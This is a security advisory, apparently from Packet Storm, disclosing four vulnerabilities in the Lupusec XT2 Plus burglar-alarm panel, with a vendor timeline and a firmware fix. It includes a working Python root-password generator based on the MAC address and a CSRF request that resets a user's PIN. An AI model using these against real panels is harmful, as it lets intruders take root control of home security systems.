Lupusec XT2 Plus Main Panel Shared Secrets / Secret Disclosure / CSRF

2019-04-0400:00:00
Dan Fabian
packetstormsecurity.com
JSON
`=======================================================================  
title: Multiple Vulnerabilities  
product: Lupusec XT2 Plus Main Panel  
version: Firmware 0.0.2.19E  
homepage: https://www.lupus-electronics.de/  
found: 01/2019  
by: D. Fabian  
=======================================================================  
  
Vendor description:  
-------------------  
"The new LUPUSEC-XT2 Plus is an innovative burglar alarm, smart home,  
and video surveillance system that is reliable, easy to use, and  
extremely versatile. It is the operating system for your building."  
  
Source:  
https://www.lupus-electronics.de/shop/en/Alarm-Smarthome/Centrals/LUPUSEC-XT2-Plus-Main-Panel-p.html  
  
  
Vulnerability description:  
-----------------------------------  
1) Shared SSL certificate  
All devices share the same SSL key. Anyone who is capable of  
downloading the firmware off the internet can perform a MITM attack.  
  
  
2) Root password derived from MAC address  
While the root password is unique per device, it is derived from the  
MAC address and can be fairly easily calculated off a hard-coded  
secret. The panel runs a telnet server on port 55023, where the  
calculated root password works. Additionally  
https://alarm/action/welcomeGet discloses the MAC address without  
authentication over the web interface. In combination, all of this is  
sufficient to authenticate as root to any XT2 device exposed directly  
on the internet.  
  
The below small Python script returns the root password for the given  
MAC address.  
  
import hashlib  
import sys  
  
mac = "001122aabbcc" # MAC address without colons in all lowercase  
x = "7jBhPZVbCJMrS9qg6KtxzHR5T2dk3NmvQ4WDywFsYpXnc8Gf"  
y = "5156" + mac + "2759"  
digest = hashlib.sha256()  
digest.update(y)  
z = digest.digest()  
sys.stdout.write(x[ord(z[5]) % len(x)])  
sys.stdout.write(x[ord(z[7]) % len(x)])  
sys.stdout.write(x[ord(z[28]) % len(x)])  
sys.stdout.write(x[ord(z[6]) % len(x)])  
sys.stdout.write(x[ord(z[24]) % len(x)])  
sys.stdout.write(x[ord(z[15]) % len(x)])  
sys.stdout.write(x[ord(z[13]) % len(x)])  
sys.stdout.write(x[ord(z[16]) % len(x)])  
  
sys.stdout.flush()  
  
  
3) Configuration including passwords downloadable without authentication  
If the configuration of the device has been exported since the  
previous reboot, it can be downloaded without authentication via  
https://alarm/temp/config.tar.gz. The configuration contains PINs,  
user passwords, and all other configuration settings. Passwords and  
PINs are "encrypted" using a simple substitution cipher.  
  
  
4) XML API vulnerable to CSRF  
The XML API accepts requests via both GET and POST, and does not  
require CSRF tokens. E.g. the following request sets the PIN of user 5  
to 4444. The MAC address is publicly disclosed via the web interface  
per issue #2.  
  
https://alarm/action/xmlCmd?strXML=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%0A%3Cp%3E%0A++%3Cmac+v%3D%2200%3A11%3A22%3A33%3A44%3A44%22%2F%3E%0A++%3Ccmds%3E%0A%3Ccmd+a%3D%22setUser%22%3E%0A%3Carea+v%3D%221%22%2F%3E%0A%3Cno+v%3D%225%22%2F%3E%0A%3Ccode+v%3D%224444%22%2F%3E%0A%3Cname+v%3D%22test%22%2F%3E%0A%3Clatch+v%3D%220%22%2F%3E%0A%3C%2Fcmd%3E%0A++%3C%2Fcmds%3E%0A%3C%2Fp%3E  
  
  
Vendor contact timeline:  
------------------------  
2019-01-09: Contacted the vendor  
2019-01-09: Vendor reply saying that the issues are known and should be fixed  
in the new firmware release.  
2019-03-26: Vendor reply saying the new firmware was released  
  
  
Solution:  
---------  
Per the vendor’s recommendation, update the firmware to version v0.0.3.0.  
  
Note that I didn’t verify whether the issues are indeed resolved in  
the new version. Either way it’s probably a good idea to only expose  
the device through a VPN.  
  
`
JSON